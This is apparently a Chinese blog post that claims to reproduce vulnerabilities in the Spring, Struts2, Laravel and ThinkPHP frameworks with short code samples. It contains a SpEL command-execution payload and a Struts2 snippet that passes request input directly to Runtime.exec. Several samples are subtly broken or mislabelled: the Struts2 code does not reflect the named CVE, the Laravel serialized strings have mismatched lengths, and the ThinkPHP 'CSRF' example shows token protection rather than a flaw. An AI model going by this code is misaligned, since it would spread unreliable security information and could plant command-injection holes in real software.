框架安全-CVE 复现&Spring&Struts&Laravel&ThinkPHP漏洞复现

由于复现漏洞涉及的内容较多，下面我将给出Spring、Struts2、Laravel和ThinkPHP常见的几个漏洞复现实例。

1. Spring框架的Spring Expression Language (SpEL) 漏洞复现：

import org.springframework.expression.ExpressionParser;
import org.springframework.expression.spel.standard.SpelExpressionParser;
 
public class SpelVulnerability {
    public static void main(String[] args) {
        String payload = "T(java.lang.Runtime).getRuntime().exec('whoami')";
        ExpressionParser parser = new SpelExpressionParser();
        parser.parseExpression(payload).getValue();
    }
}

2. Struts2框架的S2-059漏洞复现：

import org.apache.struts2.ServletActionContext;
 
public class S2_059_Vulnerability {
    public void execute() throws Exception {
        String param = ServletActionContext.getRequest().getParameter("param");
        Runtime.getRuntime().exec(param);
    }
}

3. Laravel框架的序列化漏洞复现：

use Illuminate\Contracts\Support\Arrayable;
 
class ArbitraryCode implements Arrayable {
    public function toArray() {
        return [
            'O:21:"Illuminate\Support\Facades\":3:{s:5:"class";O:23:"Illuminate\Support\Facades\Facade":0:{}s:5:"alias";O:20:"Illuminate\Support\Str":0:{}s:12:"resolvedInstance";O:56:"Illuminate\Encryption\Encrypter":2:{s:8:"key";s:3:"key";s:13:"iv";s:16:"iv";}}',
            'O:23:"Illuminate\Support\Facades\Facade":0:{}',
            'O:56:"Illuminate\Encryption\Encrypter":2:{s:8:"key";s:3:"key";s:13:"iv";s:16:"iv";}'
        ];
    }
}
 
$serialized = serialize(new ArbitraryCode());

4. ThinkPHP框架的跨站请求伪造(CSRF)漏洞复现：

public function csrf() {
    $token = think\facade\Request::token();
    echo '<form method="post" action="http://your-target.com/action">
        <input type="hidden" name="' . $token . '" value="' . $token . '">
        <input type="submit" value="Submit">
    </form>';
}

这些代码实例仅供学习和测试使用，不得用于非法活动。对于复现漏洞，建议在受控环境中进行，并遵守所有适用的法律和政策。